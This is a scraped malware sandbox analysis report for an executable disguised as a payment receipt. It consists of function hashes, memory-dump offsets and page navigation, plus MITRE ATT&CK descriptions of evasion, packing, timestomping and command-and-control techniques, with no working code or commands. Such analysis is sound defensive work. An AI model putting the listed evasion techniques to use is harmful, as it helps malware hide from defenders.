Snapshot File: hcaresult_0_2_108d000_PAYMENT_RECEIPT_STAN100699.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c2759ce25c1ebb37eee4e08ee1ea1954b0b184f01c778ed740ed775f8fe83d3
Instruction ID: 8d68a359f4568f9c91328223b7787fe36a8f778c7c257919509826e39e357f52
Opcode Fuzzy Hash: 4c2759ce25c1ebb37eee4e08ee1ea1954b0b184f01c778ed740ed775f8fe83d3
Instruction Fuzzy Hash: B9213671548200DFCB01EF58D9C0B6BBFA5FB84320F20C6A9E9890B296C736E456C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0108D4D7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4203111883.000000000108D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0108D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_108d000_PAYMENT_RECEIPT_STAN100699.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: a38a008cd7e5595a38cbd1e302aeda0be78121fb1f1669a05ab1aeb1fd7ccb96
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 80110372404240CFCB02DF44D5C4B16BFB2FB84328F24C2AAD8890B257C336D45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0108D3EB Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4203111883.000000000108D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0108D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_108d000_PAYMENT_RECEIPT_STAN100699.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 1e40e03dc21323859eeaa7357f371db72b99e5e3ef19de662661527a02cd14b3
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: D3110376408240CFCB02DF48D5C4B56BFB1FB84324F24C6A9D8890B257C336E45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02CF2868 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4203526562.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cf0000_PAYMENT_RECEIPT_STAN100699.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00f3f3a4c135438cfcb5bc1b518dc33fe2e14c6bb84d68bca2813d4c2cbdddae
Instruction ID: bb56e0374fcb0c1e0aa263534037cc3e869c14384bd9e91a325e841f81005e2c
Opcode Fuzzy Hash: 00f3f3a4c135438cfcb5bc1b518dc33fe2e14c6bb84d68bca2813d4c2cbdddae
Instruction Fuzzy Hash: 9BF01C70E05308EFCB95EFA9940599CBFF0AF85300F1081EAD944E7352D7394A05DB92

Uniqueness

Uniqueness Score: -1.00%

Function 02CF2670 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4203526562.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cf0000_PAYMENT_RECEIPT_STAN100699.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: deeb191308f0c2c442c55472afd934e5be273abbf575a33242ce1e78e82eff4e
Instruction ID: 28d078dbacb555ff933e91dba120b008bac65883b5df4183bae69c7a26fd5cc8
Opcode Fuzzy Hash: deeb191308f0c2c442c55472afd934e5be273abbf575a33242ce1e78e82eff4e
Instruction Fuzzy Hash: 8FE09275945208EFCBD1DBB8A4055DD7BB1EF82300F1081EAD544DB125DA764E05DB93

Uniqueness

Uniqueness Score: -1.00%

Function 02CF2D03 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4203526562.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cf0000_PAYMENT_RECEIPT_STAN100699.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5281dbc3ff8b6d2bf09974d04ece14ffff22bf2a9378eac1f7b83d08b811cfd1
Instruction ID: dd97c653eddbc788ba7a27c7d430cbea0504f5bd1494aab0e7bba7677bfdc5b1
Opcode Fuzzy Hash: 5281dbc3ff8b6d2bf09974d04ece14ffff22bf2a9378eac1f7b83d08b811cfd1
Instruction Fuzzy Hash: 26F0B770D04248AFCB85DBA8D554A9CBFB0EF4A310F1481EAD85497251D6355A51DB41

Uniqueness

Uniqueness Score: -1.00%

Function 02CF2318 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4203526562.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cf0000_PAYMENT_RECEIPT_STAN100699.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03808cb711cd46dabd99dde38f19a393a4c436d0c9f6c5cdf694960c44026ae8
Instruction ID: 9541871b65d025df6c8844a5746ad4ad34d353a0c56fa9fa79067c790bf27ffb
Opcode Fuzzy Hash: 03808cb711cd46dabd99dde38f19a393a4c436d0c9f6c5cdf694960c44026ae8
Instruction Fuzzy Hash: 6FE092B0D05208DFCB85DBA4E54259CBFB4EB96310F2481EED808E7252C7324E4ACB82

Uniqueness

Uniqueness Score: -1.00%

Function 02CF0A08 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4203526562.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cf0000_PAYMENT_RECEIPT_STAN100699.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 849b15b1c0d50473c53c99babf2642746f0da7628a6ee6b73005e2e4ba8268e1
Instruction ID: d4210e242a7ab53adc514a7b91247bebefdb1d8f540e81934db9556d70ef2c0a
Opcode Fuzzy Hash: 849b15b1c0d50473c53c99babf2642746f0da7628a6ee6b73005e2e4ba8268e1
Instruction Fuzzy Hash: 74E06D709852499FC752DBB498045AA7BF0AB4A314B1045EA9084DB162EB354B55DB41

Uniqueness

Uniqueness Score: -1.00%

Function 02CF26B9 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4203526562.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cf0000_PAYMENT_RECEIPT_STAN100699.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb28aa0c2b0d4848ce8935a41106fcba332e9d8911496d60148757f19b2ed926
Instruction ID: 6755f4d84ba449ae46ce0ee57c7e68e8e94dfe1cbb2ba65288f0c204869fc905
Opcode Fuzzy Hash: cb28aa0c2b0d4848ce8935a41106fcba332e9d8911496d60148757f19b2ed926
Instruction Fuzzy Hash: 8CE0C970960244DFCB85DFB8D444A9C7BB4AF15710F6041AAD805D7262D6358A44CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02CF2D10 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4203526562.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cf0000_PAYMENT_RECEIPT_STAN100699.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98763f7bec2e03cfe707b5a3493e048c4867e842d9f77df070d2c404d1e1c4de
Instruction ID: e90bf4985b23f82c72456f325a38d3e16d66209c3ea7beb91c4d25bc825243d7
Opcode Fuzzy Hash: 98763f7bec2e03cfe707b5a3493e048c4867e842d9f77df070d2c404d1e1c4de
Instruction Fuzzy Hash: 69E0C274E00208AFCB84DFA8D544A9CBBF0EB88310F10C1AAA818A7340D736AA51DF81

Uniqueness

Uniqueness Score: -1.00%

Function 02CF2680 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4203526562.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cf0000_PAYMENT_RECEIPT_STAN100699.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 502e0bf4906ce0856a1f6f849bbd5a377c0510a3a970ef7f8c1da9cbd1c644ef
Instruction ID: 6a121734e54ed6f6043f8a0a087ddd11b0a5e3f975469f9309d9d06610b3ed1c
Opcode Fuzzy Hash: 502e0bf4906ce0856a1f6f849bbd5a377c0510a3a970ef7f8c1da9cbd1c644ef
Instruction Fuzzy Hash: 88D0C77290110CABCB80EBE8E400A8E7BF9AB84300F0040A995049B120EE324A00AB82

Uniqueness

Uniqueness Score: -1.00%

Function 02CF0A18 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4203526562.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cf0000_PAYMENT_RECEIPT_STAN100699.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a81ed50346d8cd956f313536b58b610e7e11b159d6f5cee17a2a84e62f2c94a
Instruction ID: 546b8e14c962e116518d525a435ec727ddece27a40a19a5fbc2c29725d01c497
Opcode Fuzzy Hash: 4a81ed50346d8cd956f313536b58b610e7e11b159d6f5cee17a2a84e62f2c94a
Instruction Fuzzy Hash: 43D0C270A4120CDFC740DFB5D80458A7BF8EB09309F0005E69044DB110EF324A049B81

Uniqueness

Uniqueness Score: -1.00%

Function 02CF2328 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4203526562.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cf0000_PAYMENT_RECEIPT_STAN100699.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3ab61bf5e226e0abad04b4a8661b2e17c5aa11109b2f7cf154653113e46073c
Instruction ID: dd5426a55bc82406309eab0bf2ac5c4fdf39f5c6a67bb8664a5822e8922e1649
Opcode Fuzzy Hash: e3ab61bf5e226e0abad04b4a8661b2e17c5aa11109b2f7cf154653113e46073c
Instruction Fuzzy Hash: 08E01274A04108DBC744DF94E54195DBBB4EB85314F5081DDDC0867350CB325E46DB81

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02CF0A51 Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

4'kq, xrefs: 02CF0B3A

Memory Dump Source

Source File: 00000000.00000002.4203526562.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cf0000_PAYMENT_RECEIPT_STAN100699.jbxd

Similarity

API ID:
String ID: 4'kq
API String ID: 0-3255046985
Opcode ID: e7fdef0796fef7670a6f1790b5451249b9e8bda86c3a17c51c3ff888390bb4f3
Instruction ID: 994399f582144ead73ba833cbe70a762fe307aff943b4e439c1b43989f75638e
Opcode Fuzzy Hash: e7fdef0796fef7670a6f1790b5451249b9e8bda86c3a17c51c3ff888390bb4f3
Instruction Fuzzy Hash: 73712974A01209CFDB19EF6BE95069ABBF2FBC8700F14C629D044DB268EB7559098F41

Uniqueness

Uniqueness Score: -1.00%

Function 02CF0A60 Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

4'kq, xrefs: 02CF0B3A

Memory Dump Source

Source File: 00000000.00000002.4203526562.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cf0000_PAYMENT_RECEIPT_STAN100699.jbxd

Similarity

API ID:
String ID: 4'kq
API String ID: 0-3255046985
Opcode ID: ffc42817a2d2541450c6b45a44068d4dfa43234a31e91facaf8766e9398a8d71
Instruction ID: da313fe11472e0155d02d5b669eb66cea3e8882d9e1ca28f9239335e200867a3
Opcode Fuzzy Hash: ffc42817a2d2541450c6b45a44068d4dfa43234a31e91facaf8766e9398a8d71
Instruction Fuzzy Hash: 91610A74A01209CFDB19EF6BE95069ABBF2FBC8704F14C629D044DB368EB75590A8F41

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PAYMENT_RECEIPT_STAN100699.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Windows Analysis Report
PAYMENT_RECEIPT_STAN100699.exe